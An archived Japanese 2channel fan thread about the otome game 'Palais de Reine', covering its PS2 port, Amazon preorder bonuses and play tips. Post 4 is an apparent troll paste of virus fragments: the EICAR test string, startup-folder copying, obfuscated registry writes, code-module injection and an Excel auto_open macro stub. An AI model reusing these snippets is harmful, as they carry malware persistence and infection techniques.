2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

乙女@パレドゥレーヌ/工画堂 8ターン

1 :名無しって呼んでいいか?:2007/09/08(土) 10:19:46 ID:???
Windows専用プリンセスシミュレーション
2006年11月10日発売

ファンディスク『パレドゥロワイアル』2007年3月23日発売。

公式サイト
ttp://filia.jp/
ファンディスク 公式ページ
ttp://filia.jp/royale/


攻略wiki
ttp://www22.atwiki.jp/palaisdereine/
パレドゥレーヌ うpスレ
ttp://jbbs.livedoor.jp/bbs/read.cgi/game/15735/1163695467/
【ネタバレ】女向ゲーム一般@攻略総合スレ【注意】
http://game12.2ch.net/test/read.cgi/ggirl/1102036796/l50

前スレ
乙女@パレドゥレーヌ/工画堂 7ターン
http://game12.2ch.net/test/read.cgi/ggirl/1177928335/

過去スレ
乙女@パレドゥレーヌ/工画堂 6ターン
http://game12.2ch.net/test/read.cgi/ggirl/1171282526
乙女@パレドゥレーヌ/工画堂 5ターン
http://game12.2ch.net/test/read.cgi/ggirl/1164989529
乙女@パレドゥレーヌ/工画堂 4ターン
http://game9.2ch.net/test/read.cgi/ggirl/1163120725
乙女@パレドゥレーヌ/工画堂 3ターン
http://game9.2ch.net/test/read.cgi/ggirl/1161669060
乙女@パレドゥレーヌ/工画堂 2ターン
http://game9.2ch.net/test/read.cgi/ggirl/1158381539
乙女@パレドゥレーヌ/工画堂
http://game9.2ch.net/test/read.cgi/ggirl/1145893779

次スレは>>970>>980の辺りで立てること


2 :名無しって呼んでいいか?:2007/09/08(土) 10:23:06 ID:???
PS2版『パレドゥレーヌ』2007年10月18日発売予定。

PS2版 公式サイト
ttp://www.interchannel.jp/game/palaisdereine/index.html

インターチャネル
対応機種 プレイステーション2
発売日 2007年10月18日発売予定
価格 7140円[税込]
ジャンル シミュレーション / 恋愛
備考 企画・制作:工画堂スタジオ

●プレイステーション2版での追加要素
プレイステーション2版には、シナリオの加筆やイベントグラフィックを追加。
エンディングも主要なキャラクターを中心に大幅加筆有り

3 :名無しって呼んでいいか?:2007/09/08(土) 10:28:00 ID:???
>>1


4 :名無しって呼んでいいか?:2007/09/08(土) 10:38:32 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :名無しって呼んでいいか?:2007/09/08(土) 11:11:21 ID:???
>>1殿下乙です


6 :名無しって呼んでいいか?:2007/09/08(土) 12:05:09 ID:???
うるせーばか

7 :名無しって呼んでいいか?:2007/09/08(土) 18:28:30 ID:???
>>1殿下へ変わることなき親愛と、永遠の乙を。

8 :名無しって呼んでいいか?:2007/09/08(土) 22:11:14 ID:???
>>1殿下乙ですわ

9 :名無しって呼んでいいか?:2007/09/09(日) 09:23:55 ID:???
スレ立て乙です。

殿下方に教えを請いたいのです。
S・ディオールを手に入れたいのですが、
社会1にするために予算を社会だけ1にするとすぐ革命。
ならばとスタート時からバランス良くALL1にし続けても革命で、
一度たりと手に入った試しがありません。なにとぞアドバイスを頂けないでしょうか。

10 :名無しって呼んでいいか?:2007/09/09(日) 13:26:26 ID:jRvVgNSe
薄命の騎士様、人気薄?

11 :名無しって呼んでいいか?:2007/09/09(日) 14:39:01 ID:???
1000 名無しって呼んでいいか? sage 2007/09/09(日) 14:37:50 ID:???
1000なら次作はエクレールの侍女立志伝

999のつもりで書き込んだのにorz

12 :名無しって呼んでいいか?:2007/09/09(日) 14:44:52 ID:???
>>11
ちょっと欲しいかもしれない
乙女要素は減りそうだけど

13 :名無しって呼んでいいか?:2007/09/09(日) 15:39:31 ID:???
ひたすら姫様を応援するゲームになりそう。
カプッル成立ゲーム?仲人ゲーか?

14 :名無しって呼んでいいか?:2007/09/09(日) 15:46:16 ID:???
黒殿下の黒い部分を一手に引き受けてるといった設定になりそうな気もするw

15 :名無しって呼んでいいか?:2007/09/09(日) 16:07:30 ID:???
キャベツ大食いゲーを期待しました。

16 :名無しって呼んでいいか?:2007/09/09(日) 19:21:54 ID:???
>>1
スレ立て乙です。

4週目終了。グイード・フォルカー・コルネリウス・執政官のエンドを見た。
グイードのEDが3種類もあって、Bad?切ないね…
コルネリウスは逆に見ている自分が照れますね。
こう妄想を掻き立てられると、また1周したくなりますね。
このスレの猛者殿下達のように暗殺もやってみたいけど、お金の貯め方がよく分らない…orz

17 :名無しって呼んでいいか?:2007/09/09(日) 20:54:40 ID:???
>>15
城内お掃除ゲーとか、亡霊と漫才ゲーとかもありそうだ。

>>16
投資はけちらずお金をかけた方が、結果的に国が発展して懐も潤うよ。
知力高めの殿下がお勧め。
決闘はせずに、贈物で領主の好感度を上げれば
ロドヴィックあたりが貢いでくれるかもしれません。

18 :名無しって呼んでいいか?:2007/09/09(日) 23:28:11 ID:???
>>1殿下乙です
そして前スレ987の殿下、この恩は忘れません。

製品版をプレイして、しゃべることにすごく感動したw
でも暗殺って意外と成功しないんだね(´・ω・)

19 :名無しって呼んでいいか?:2007/09/14(金) 00:27:52 ID:???
今日やっと宰相EDB見れた。
もうね、萌え転げましたよ殿下

でも欲をいうとEDまでちゃんと声ほしかった・・・
PS版が、初めから声あるキャラだけでも最後まできちんと声入ってたら買うのにな

20 :名無しって呼んでいいか?:2007/09/14(金) 01:25:38 ID:???
今更なんだが、衣装がちっとも埋まらん…全部集めた姐さんいる?

21 :名無しって呼んでいいか?:2007/09/14(金) 04:58:04 ID:???
今度こそ下着姿の殿下で歩き回って周りの反応を楽しみたい

22 :名無しって呼んでいいか?:2007/09/16(日) 10:00:19 ID:???
>>20
衣装は栄華9になるように頑張ってればみるみる埋まるようになりますわ
アクセサリーだけはエンディング見まくらないと集まらないので大変ですが

23 :名無しって呼んでいいか?:2007/09/16(日) 23:35:18 ID:???
衣装だけど
今までは順調に集めてきたのに
宰相からもらったドレスとか青い指輪だとかが
セーブしてもED迎えた後でもメモリーに入らないのだけど
どうしてだろう?

24 :名無しって呼んでいいか?:2007/09/16(日) 23:38:05 ID:???
メモリーズに集めたものがセーブされるのは、
ゲームをタイトルから終了したときらしい。
強制終了とかはなさいませんでしたか。

25 :名無しって呼んでいいか?:2007/09/17(月) 09:13:36 ID:???
強制終了がいまいちわからないけど
右上の×を押して終了したのだけどそれがいけなかったのでしょうか?
ついでにその日攻略したほかの騎士達の場面も入ってなかったから
そのせいなのかな?
終了する時はExitで終了したほうがいい?

26 :名無しって呼んでいいか?:2007/09/17(月) 10:48:34 ID:???
そうそう。
Exitを押して終了しないとダメらしいよ。

27 :名無しって呼んでいいか?:2007/09/20(木) 09:54:55 ID:???
もふ もふ 派!

28 :名無しって呼んでいいか?:2007/09/20(木) 11:47:34 ID:???
暇つぶしで体験版DLしてみたら、結構面白くて続きが気になってきた。
ただ、サイトに載ってるイメージイラスト(?)そのままのキャラクターデザインだったら、いちもにもなく
買いに走るんだけど。
うーん迷う・・・。

29 :名無しって呼んでいいか?:2007/09/20(木) 12:06:47 ID:???
あの絵を量産するのは至難の業ですw

30 :名無しって呼んでいいか?:2007/09/20(木) 14:03:49 ID:???

わたしは逆にゲームのイラストだったから買う気になった派なんですよ。
パッケージまんまのイラストだったら買わなかったかも。。。

好きな方に喧嘩売ってるわけじゃないんだけどね。
好みってそれぞれだなぁと。

31 :名無しって呼んでいいか?:2007/09/20(木) 14:27:19 ID:???
マスコットキャラ版もカワイイですよね
黒貴族たん(あえてたん付け)のいたずらっぽい表情とか

32 :名無しって呼んでいいか?:2007/09/20(木) 20:17:58 ID:???
>30
私も。立ち絵甘すぎず好きだー
特にじいちゃん達最高
パッケ絵も美麗で好きですけど
殿下の顔が怖い


33 :名無しって呼んでいいか?:2007/09/21(金) 17:53:32 ID:???
最近購入して一通りクリア。
ディトリッシュの黒貴族討伐の後に、リュシアン工作イベントが起こって、「父を殺す
気はない」と言い切った彼にものすごく突っ込みたかった。

34 :名無しって呼んでいいか?:2007/09/25(火) 01:00:58 ID:???
予約しちゃった
追加要素たくさんありますように

35 :名無しって呼んでいいか?:2007/09/25(火) 22:22:47 ID:???
え、ちょw
今オーロフクリアしたんだけど最後のちゅ、って効果音は自分の聞き間違い?脳内で勝手に出たんだろうかw
もし入っているなら工画堂GJスグル
すまん、テンションが可笑しい

36 :名無しって呼んでいいか?:2007/09/25(火) 22:54:32 ID:???
>>35
(・∀・)ニヤニヤ

まあ自分も変なテンションになったくちだがw

37 :名無しって呼んでいいか?:2007/09/26(水) 01:28:54 ID:???
>>35
ニヤニヤ(・∀・)デスワ

38 :名無しって呼んでいいか?:2007/09/27(木) 00:23:04 ID:???
>35
(・∀・)ニヤニヤ
自分m

39 :名無しって呼んでいいか?:2007/09/27(木) 00:54:20 ID:???
どこにキスしたのかな、おでこかほっぺか唇か、あるいは身体中か。

40 :名無しって呼んでいいか?:2007/09/27(木) 01:49:03 ID:???
どこからどこまでが口なんだろーか?

41 :名無しって呼んでいいか?:2007/09/27(木) 01:53:30 ID:???
>>39

殿下「どうしてオーロフの口はそんなに大きいの?」
オーロフ「それはな……姫さんを食うためだよ!」

BAD ED

42 :名無しって呼んでいいか?:2007/09/27(木) 06:41:39 ID:???
エロゲ的にはそこから本番

43 :名無しって呼んでいいか?:2007/09/27(木) 10:26:55 ID:???
どこがBAD ENDなのかと小一時間(*´д`)

44 :名無しって呼んでいいか?:2007/09/27(木) 12:17:06 ID:???
ヴィン「で…殿下!その大きなお腹は一体どういう事ですか!!」
殿下「狼に食べられちゃったのよ」

45 :名無しって呼んでいいか?:2007/09/27(木) 14:55:08 ID:???
>>41の後は普通に画面真っ赤でよろしく

46 :名無しって呼んでいいか?:2007/09/27(木) 17:10:23 ID:???
>>44
狼を食べちゃったのよ
かと思ってガクブルした
悪食にも程があるw

ですがエロネタは自重なさって下さい、殿下方

47 :名無しって呼んでいいか?:2007/09/27(木) 19:59:11 ID:???
>>46
人狼は雑食だろうからおいしくないでしょうねw

48 :名無しって呼んでいいか?:2007/09/28(金) 00:07:32 ID:???
ウィレムは美味しそう

49 :名無しって呼んでいいか?:2007/09/29(土) 22:21:52 ID:???
あと半月ほどで毒殺できる!

50 :名無しって呼んでいいか?:2007/10/01(月) 16:00:12 ID:???
3週目終了。
ディトリッシュとヴィンフリートが萌えを直撃しててたまらん…!!ハァハァ
しかしリュシアンがどうしても落とせない。何故…
贈り物しまくってるのにイベント3回目が起こりません。あっちからも貢物貰うくらいなのに…!
とりあえず前回のプレイでは宰相に王手をかける半歩前でタイムオーバーだったからもうちょっと早めに手を出してみようと思う。

51 :名無しって呼んでいいか?:2007/10/01(月) 16:30:57 ID:???
覇道が星5つぐらい必要だったはず

52 :名無しって呼んでいいか?:2007/10/01(月) 16:51:59 ID:???
あと17日

53 :50:2007/10/01(月) 17:03:30 ID:???
>>51
今確認してみたら、覇道6、王道6でした…
好感度足りなかったのかな(´・ω・`)

54 :名無しって呼んでいいか?:2007/10/01(月) 22:30:57 ID:???
>53
2回目のイベントで読書を選んでいたら、ちゃんと送り返さないと
その先には進めませんよ、殿下?
あと、あまり2回目と3回目イベントの間が空くと、自分も
進まなくなった事がありました。
3回目はヘルゼーエンが絡むイベントと連続で起こすとイイので、
本を返すなら聖誕祭後くらいがイイんではないでしょうか?

55 :名無しって呼んでいいか?:2007/10/02(火) 10:23:34 ID:???
PS2版で初めて知ったんだけど、面白そうだね
Amazonの特典…もふもふしてえええええ

56 :名無しって呼んでいいか?:2007/10/02(火) 18:33:43 ID:???
殿下方、ご予約はどちらになさいましたか?
わたくしはやっぱりAmazonですわ

57 :50:2007/10/02(火) 18:47:47 ID:???
>>51
>>54
殿下方へ変わることなき親愛と、永遠の親愛を。
2回目の後、本を返していませんでした…忘れてた…!!orz
本を返した後、黒貴族との間でエピ爺さんを巡ってなんやかんやあったおかげで覇道も上がり、
リュシアン・宰相・黒貴族の同時攻略に成功しました。
あーーーりがとーーーーう!!!

しかし、宰相と黒貴族を工作で口説き落として完全勝利って大分時間かかりそうですね。
完全勝利への道は今回もタイムオーバー…
いっそ宰相毒殺、黒貴族はディトリッシュに任せちゃおうかなw

58 :名無しって呼んでいいか?:2007/10/02(火) 18:58:24 ID:???
PC版のサイトで、色々と妄想膨らませていたんだけど(つまり未プレイ、PS版で買う気まんまんだった)
PS版の公式サイトで、各キャラの年齢を見て、超ショック。
特にアデライート(28くらいと思ってた)、ヴァン(30くらいと思ってた)、ヴェンツェル(40〜50くらいかと)、エピドート(70くらいかと)。

てか皆若いよ!バカキャラ、ショタキャラ以外は、全員+5歳くらいにしてほしい。
買うけどちょっとショックだ。

59 :名無しって呼んでいいか?:2007/10/02(火) 19:25:57 ID:???
中世くらいの文明レベルだと医療技術とかの問題で寿命短いから成人年齢も低いはず

60 :名無しって呼んでいいか?:2007/10/02(火) 19:28:51 ID:???
昔の人は寿命短いから同じ年齢でも歳のとり方が違うと思うよ
15歳で成人だったり結婚したり子供生んだり
ファンタジーもその法則で考えれば気にならないはず

と書き込んでる内にレスがorz

61 :名無しって呼んでいいか?:2007/10/02(火) 19:30:07 ID:???
確かにエピ爺は若すぎだろとは思った
けど上の二人が言ってる理由で自分を納得させた

62 :名無しって呼んでいいか?:2007/10/02(火) 21:56:45 ID:???
>>57殿下
私目の勘違いならばよいのですが、
宰相殿と黒貴族は工作のみで落とせなかったような気がします…

シエンやお爺ちゃま(強化済みVer.)だと楽勝ですので、頑張ってみてください。

63 :名無しって呼んでいいか?:2007/10/04(木) 00:15:57 ID:???
>>57
殿下、前スレにあった『領主全員聖誕祭』を下地にすれば、
領主全員生存の完全勝利も楽勝っぽいですよ。www

64 :名無しって呼んでいいか?:2007/10/05(金) 00:39:34 ID:???
予約まだやっててよかった
PC版をちょっと前からはじめた新参者です。
ヴィンフリートのイベントもPS2では増えてることを願いつつメッセで予約
皆様はPS2版は入手されるのでしょうか?
攻略とか変わってくるのかな…

65 :名無しって呼んでいいか?:2007/10/05(金) 08:27:08 ID:???
メッセで予約しようと思ったけど、予約受付してないの?
ガールズの所も、普通の所も無いし、検索しても無いんだけど。
唯一ガールズの所に特典有りってなってるだけ。リンクは無し

66 :65:2007/10/05(金) 08:29:23 ID:???
自己解決しました…見落としだったorz

67 :名無しって呼んでいいか?:2007/10/05(金) 14:30:32 ID:???
>>64
PCはお試し版だけでPS版をひたすら待ち続けているよw
色々な特典に惹かれるけど結局6400円送料込みって楽天の出店で買ってしまった……
メーカー特典しかつかないけどポイント溜め込んでいたから1800円くらいで買えるので、つい……orz

68 :名無しって呼んでいいか?:2007/10/05(金) 17:21:49 ID:???
PS2版を買おうと思って各店色々見て回ってるんだけど
アマゾンて発売日に届きますかね?
凄く楽しみなので待つくらいなら他の店で…とか色々


69 :名無しって呼んでいいか?:2007/10/05(金) 17:21:58 ID:???
お試し版すら我慢してPS2版を待ち続けている自分も通りますよ。
まだ微妙に悩んでいるんだが、konozamaで予約してCDとポストカードをゲットする予定。
ポスカなんて普段なら鼻先で笑い飛ばすというのに、あの絵柄は卑怯だw

70 :名無しって呼んでいいか?:2007/10/05(金) 17:33:12 ID:???
>>69
68です、同じような人っているもんですねw
発売日に届く(前日でも大歓迎)ならすぐ決めるん
ですが、なんかイマイチ不安なんだよなぁ…と毎日
画面を眺めて悩んでいる
連休明けまで悩むかな…

71 :名無しって呼んでいいか?:2007/10/05(金) 17:41:08 ID:???
>>70
は、同士がw
69ですがあれです、発売日には届かないもんだと思ってますわkonozamaですもの。
でも結局、発売日にやりたいって理由で予約ボタンが押せないというジレンマ。
予約受付終わっても困るし……お互い悩むっすねえ。

72 :名無しって呼んでいいか?:2007/10/05(金) 17:42:05 ID:???
knozamaのポスカは確かに反則w
きっと殿下は発売日ゲットとポスカの狭間で苦しんでいる私らを見てあざわらっているんだ!

73 :名無しって呼んでいいか?:2007/10/05(金) 19:48:31 ID:???
尼で以前予約ってた奴はキャンセルして予約し直した方が良いよ。
20%OFFになってるよ

74 :名無しって呼んでいいか?:2007/10/05(金) 20:25:12 ID:???
予約しなおした。
卑怯なポスカの絵柄見た事無いが、どんなシチュエーションですか。


75 :名無しって呼んでいいか?:2007/10/05(金) 20:27:36 ID:???
>>74
ttp://www.interchannel.jp/game/palaisdereine/img/tokuten_amazon_L.jpg
とくと御覧あれ。

お互い発売日に届くといいねー。

76 :名無しって呼んでいいか?:2007/10/05(金) 21:01:16 ID:???
有難う。ポスカにちょいとときめいた。
コノザマ発動しない事を祈ろう。

77 :名無しって呼んでいいか?:2007/10/05(金) 22:12:18 ID:???
>>73
ありがとう!
ほんとkonozamaにならないといいな

78 :名無しって呼んでいいか?:2007/10/06(土) 00:03:05 ID:???
>>75
正直、値段下がるまで半年くらい待とうと思っていたが
これは予約せざるを得ない

79 :名無しって呼んでいいか?:2007/10/06(土) 00:34:44 ID:???
アニメイトで予約しようかと思ってたが>>75を見て激しく揺れ動く私はどうすれば。

80 :名無しって呼んでいいか?:2007/10/06(土) 01:09:19 ID:???
声なしだったくせにこの扱いw
さすがはもふもふ

81 :名無しって呼んでいいか?:2007/10/06(土) 01:33:30 ID:???
特典のもふもふの破壊力は凄まじいですねぇ
幾人もの殿下方をとりこにするとは
かく言う私もアマゾン予約組みですが

ロワイアル分は移植されるのかなぁ

82 :名無しって呼んでいいか?:2007/10/06(土) 02:19:41 ID:???
乙女ゲ界に風穴開けるキャラになるといいなもふもふ

83 :名無しって呼んでいいか?:2007/10/06(土) 08:00:28 ID:???
>>75
猛烈に欲しいけど別所で予約してあるから
保存して携帯の待ち受けにしたw
もふもふかっこいいよ

84 :名無しって呼んでいいか?:2007/10/06(土) 13:11:36 ID:???
>>82
新風を吹き込むんやのうて、風穴を開けるんかいw

あ、でも乙女ゲに漢な獣人を、というのはむしろ風穴が正しいのか。
オーロフイベント増えてるといいなあああ。
ピンで特典になるくらいだから、製作側も需要の高さは把握してるだろw

85 :名無しって呼んでいいか?:2007/10/06(土) 13:20:08 ID:???
風穴が開いて、ゲラ=ハ風のトカゲ男や、
エルフを頭からバリバリ食べるトロウルさんなんかが
攻略対象キャラになるようなゲームがどんどん出るといいな!

86 :名無しって呼んでいいか?:2007/10/07(日) 01:56:07 ID:???
ほんともふもふの話になると盛り上がるな。
たまにはランキング一位のディトリッシュも思い出してあげてください

87 :名無しって呼んでいいか?:2007/10/07(日) 02:17:37 ID:???
>>86
ディ・・・・・トリッシュ・・・?

88 :名無しって呼んでいいか?:2007/10/07(日) 02:24:51 ID:???
>>86
あの人は・・・なんというか一人だけ浮いてるから・・・

89 :名無しって呼んでいいか?:2007/10/07(日) 02:31:58 ID:???
ディトリッシュはオーロフに食べられてしまいました(キャラ的な意味で)

90 :名無しって呼んでいいか?:2007/10/07(日) 09:28:38 ID:Pn9zyzrQ
オーロフのポスカ、ここで妙に人気だったから
てっきり殿下がもふってウフフアハハなものと思っていたのに
この流し目は…!
うーん予約しようか迷うw

しかしPC版体験していない殿下さえ虜にしてるとは
もふもふマジスゲー

91 :名無しって呼んでいいか?:2007/10/07(日) 09:43:40 ID:???
もふもふ好きだが一番は宰相だったりする。
最初は何も知らんでやって、砕け散ろう。楽しみだ。

92 :名無しって呼んでいいか?:2007/10/07(日) 13:27:38 ID:???
予約しました
もふもふもふもふもふもふもふもふもふもふもふもふ

93 :名無しって呼んでいいか?:2007/10/07(日) 13:40:23 ID:???
あと11日もふもふですわ、殿下。

94 :名無しって呼んでいいか?:2007/10/07(日) 13:51:43 ID:???
>>73
情報感謝っ。
夏前から入れていた予約をキャンセルして、予約しなおした。
一割引からニ割引になるのは大きい。



95 :名無しって呼んでいいか?:2007/10/07(日) 14:45:14 ID:???
コノザマ発動したらもふもふ黒貴族に拉致されかけているってことにして自分を納得させよう

96 :名無しって呼んでいいか?:2007/10/07(日) 14:47:28 ID:???
konozamaの配送状況を確認したら、既に配送日が 10/19 - 10/21 だった件。
まあ覚悟の上さもっふもふ。

97 :名無しって呼んでいいか?:2007/10/07(日) 15:36:09 ID:???
ポストカード同じの5枚くらい欲しい
観賞用・持ち歩き用・保存用・保存用・保存用みたいな
もっふもふにしてやんよ

98 :名無しって呼んでいいか?:2007/10/07(日) 15:53:40 ID:???
konozama組多すぎだろw

99 :名無しって呼んでいいか?:2007/10/07(日) 15:58:48 ID:???
全キャラ分のポスカセットとかほしいな。

ウ゛ェンツェルはアメコミ調で

100 :名無しって呼んでいいか?:2007/10/07(日) 16:00:45 ID:???
96はkonozamaには入らんぞ
それはデフォだから
ポストカードつきませんごめんなさい配送が二週間遅れますごめんなさいがkonozama

101 :名無しって呼んでいいか?:2007/10/07(日) 16:31:01 ID:???
>>100
芳醇チゲ噴いた。

デフォなのかそうなのか…数日くらいなら遅れてもいいからポスカだけは…
密林初体験なので、毎日gkbrして待ってる。

102 :名無しって呼んでいいか?:2007/10/07(日) 16:47:40 ID:???
そんなことになったらDokusatuしてくれるわ

103 :名無しって呼んでいいか?:2007/10/07(日) 16:58:35 ID:???
>>99
その手のってオフィシャルイラストそのままか
出来不出来に差があることが多いから微妙なんだよな

104 :名無しって呼んでいいか?:2007/10/07(日) 17:13:47 ID:???
>>102
出たーッ!フィーリアさんの1ターンに10回毒殺発言だーッ!

105 :名無しって呼んでいいか?:2007/10/07(日) 17:24:11 ID:???
>>101
密林初体験ならポストに気をつけておいたほうがいい
入らなかったらドアノブに引っ掛けるポストに端だけ引っ掛けるなど
配達が宅急便じゃないんだよ…

106 :名無しって呼んでいいか?:2007/10/07(日) 19:02:17 ID:???
それはkonozama関係ないだろう
うちいつも不在票入ってるぞ

107 :名無しって呼んでいいか?:2007/10/07(日) 19:03:21 ID:???
>>105
ちょ、ま、な、なななんだそれ!
支払いが代引きだし、自営業だから必ず人がいるんでまず大丈夫とは思うが、
さすがkonozamaと呼ばれるだけのことはあるな恐ろしい…!
なにはともあれ、ありがとう先輩殿下。
ソフトもCDもポスカも、みんなのおうちに無事届きますように orz

108 :名無しって呼んでいいか?:2007/10/07(日) 19:11:24 ID:???
それはAmazonの問題っていうか、メール便の問題だからね。
http://www.amazon.co.jp/gp/help/customer/display.html?nodeId=200040590
ま、宅急便指定ができないってところはAmazonの問題か。

109 :名無しって呼んでいいか?:2007/10/07(日) 19:13:49 ID:???
なんでもかんでもkonozama言えばいいってわけじゃないwww
予約したのにポスカ来なかったら高らかに叫べ、konozamaと!

110 :名無しって呼んでいいか?:2007/10/07(日) 19:20:50 ID:???
密林ゲームは大抵宅急便で送って寄越すよ
つーかゲーム一枚をたいそうな箱に入れるから宅急便扱いになったりメール便でもノブぶらさげに
なったりするんだよ
なんだよあの無駄な空間は

111 :名無しって呼んでいいか?:2007/10/07(日) 21:05:45 ID:GKUIZbku
密林ってDVDボックスサイズ1点だとメール便で、雑誌とかあると宅配になるね
最近特典付くようになったから密林使うけどkonozamaになったことはまだ無い
予約のは殆ど配送が宅配で届くけど、メール便の時があったり基準がよく分からないね

112 :名無しって呼んでいいか?:2007/10/07(日) 21:13:50 ID:???
レイトンせんせーの特典版がkonozama発動した俺が通りますよ
発売間際に駆け込み予約すると人気商品の場合はkonozama発動しやすい
余裕もって予約してればまず大丈夫

113 :名無しって呼んでいいか?:2007/10/07(日) 21:16:28 ID:???
DVD(又はCD)一枚注文で、
支払方法がクレカやコンビニ決済→タイヤキ梱包飛脚メール便
代引き→タイヤキ梱包飛脚宅急便だと思ってたよ。
なんでDVD一枚になる時は代引きにするようにしてた。

114 :名無しって呼んでいいか?:2007/10/07(日) 21:19:36 ID:???
たとえkonozamaな結果になっても
結局もふもふのポストカードがほしいんでしょ?殿下方

115 :名無しって呼んでいいか?:2007/10/07(日) 21:20:48 ID:???
>>113
商品価格でも変わる気がする
高額になると宅急便に変わる

116 :名無しって呼んでいいか?:2007/10/07(日) 21:21:56 ID:???
>>114
(#^ω^)っ旦
まあ、これでも飲みたまえ

117 :名無しって呼んでいいか?:2007/10/07(日) 21:32:00 ID:???
>>113
うちには飛脚じゃなくてペリカンで来る(横浜)
お急ぎ便にすると黒猫

118 :名無しって呼んでいいか?:2007/10/07(日) 22:05:20 ID:???
>>115
うちは7000円ほどの新作ゲームをクレカ払いの時は
集合住宅のポストの上に野ざらしにされていた
7000円くらいは小額らしい


119 :名無しって呼んでいいか?:2007/10/08(月) 00:54:29 ID:???
あーそっか、代引しかしたことないからちゃんと宅配でくるのか
野ざらしヒドス

120 :名無しって呼んでいいか?:2007/10/08(月) 01:02:44 ID:???
野ざらしとかは配送したとこに文句言うべきじゃ…

121 :名無しって呼んでいいか?:2007/10/08(月) 05:53:23 ID:???
>>114
ああその通りさ

122 :名無しって呼んでいいか?:2007/10/08(月) 12:39:35 ID:???
宰相シナリオが増えるならPS2版も買うんだが…

123 :名無しって呼んでいいか?:2007/10/08(月) 13:05:00 ID:???
PS2は評判待ちだなあ
というか本体ごとかわにゃならんし


124 :名無しって呼んでいいか?:2007/10/08(月) 13:38:26 ID:???
乙女ゲーム買うの初めて
話が面白そうなのもあるけど、一番の理由はもふもふさんとは言えない…

125 :名無しって呼んでいいか?:2007/10/08(月) 13:44:12 ID:???
>>124
ここでなら、言っても誰も笑わないさ…

PC版もお試し版もせずに、ひたすらPS2版を正座して待ち続けています。
ヒゲの宰相を毒さt違う悩殺するために。

で、できるんだよね?

126 :名無しって呼んでいいか?:2007/10/08(月) 16:54:47 ID:???
>>122
途中イベントもだけどED後にどんな風な接し方になるのか
見てみたいよなぁ

127 :名無しって呼んでいいか?:2007/10/08(月) 17:04:15 ID:???
というか、その時のアストラッドの顔が見たい。
(アストラッドシナリオも進めていればなお良し)

128 :名無しって呼んでいいか?:2007/10/08(月) 17:27:26 ID:???
126殿下は鬼畜ですねぇ。

アストシナリオを進めてない状態で宰相ED(A)を迎えたのが、
ロワの『伝説への船出』の冒頭だと思い込みたいなぁ。

129 :名無しって呼んでいいか?:2007/10/08(月) 17:29:59 ID:???
安価ミスったー
127殿下に対して言ったつもりだったんだ。
スマン 126殿下。

ちょっと侍女殿がお茶をくださるっていうので、頭と心を鎮めてきます。

130 :名無しって呼んでいいか?:2007/10/08(月) 17:44:54 ID:???
これkonozamaで結構予約されてるね
もふもふすげー

131 :名無しって呼んでいいか?:2007/10/09(火) 00:22:04 ID:???
くやしい…でも……konozamaで予約しちゃう
モフモフっ!!

132 :名無しって呼んでいいか?:2007/10/09(火) 00:49:49 ID:???
ディトリッシュも欲しかったけど、ていうか最萌えなんだけど。
彼ならこれからも書下ろしが拝めると思ったんだ。
悩んだけど、光るモフモフは今手に入れないと拝めない気がして、
密林遅配は何度も何度も経験済みだが、モフモフにポチった。

133 :名無しって呼んでいいか?:2007/10/09(火) 00:52:30 ID:???
私も本物のもふもふが来るんだったらぽちるんだけど…
食費がかさみそうだな…

134 :名無しって呼んでいいか?:2007/10/09(火) 01:05:21 ID:???
ディトリッシュ辺りは追加イベントも多そうだしな

135 :名無しって呼んでいいか?:2007/10/09(火) 03:11:28 ID:???
もっと暗殺手段増えないかな

136 :名無しって呼んでいいか?:2007/10/09(火) 07:19:15 ID:???
>>135
暗殺コマンドにバリエーションを追加!
・暗殺するための時間帯、場所、手段、執行者を選択することが出来るようになりました。
・それぞれの項目は知力が上がる程に選択肢が増え
 暗殺対象に適切な選択をすることで効率的に暗殺を行うことが出来ます。
・贈物を併用することでさらに効率UP! 暗殺に掛かる費用を抑えつつ的確に相手を亡き者に出来ます。
・騎士や領主以外のキャラクターも暗殺が可能になりました。
 貴方を支持しない下々の者共、貴方の騎士に無礼を働いた不埒者などをALL KILL!
 ターブルロンドを赤く染め上げろ!

とか想像した。

137 :名無しって呼んでいいか?:2007/10/09(火) 08:31:25 ID:???
きるぜむお〜る〜♪とか超笑顔で歌ってる殿下を想像した

138 :名無しって呼んでいいか?:2007/10/09(火) 10:46:21 ID:???
>>137
某人間台風の方を思い出してしまった。

まあこれ以上暗殺方面に割く容量(とスタッフの労力)があるなら恋愛に回すのが常道だろうw
イベント追加はメインキャラだけじゃないといいんだけどなー。

139 :名無しって呼んでいいか?:2007/10/09(火) 12:09:58 ID:???
猫騎士のスチルを増やしてください><

140 :名無しって呼んでいいか?:2007/10/09(火) 13:36:30 ID:???
PS版を買うつもりなんだけどPC版との違いは
追加があるだけなのでしょうか?
PC版のみのイベントとかあったらPCも買っちゃいそう
シルヴェストル将軍を落としたくてたまらない

141 :名無しって呼んでいいか?:2007/10/09(火) 15:40:00 ID:???
>PC版のみのイベント
無いと思う。削らないとコンシューマーで出せない程のグロやエロはない。
深読みするとちょっとアレだけど。

142 :名無しって呼んでいいか?:2007/10/09(火) 17:10:53 ID:???
ウィーギンティと共に光の中に消えた殿下が、
戻ってみるとガニ股で痛そうに歩いてる、くらいだもんな、修正されそうなイベントは。

143 :名無しって呼んでいいか?:2007/10/09(火) 18:27:14 ID:???
>>141 142
ありがとう
ヒゲの素敵な騎士にwktkしながら発売まで耐えます
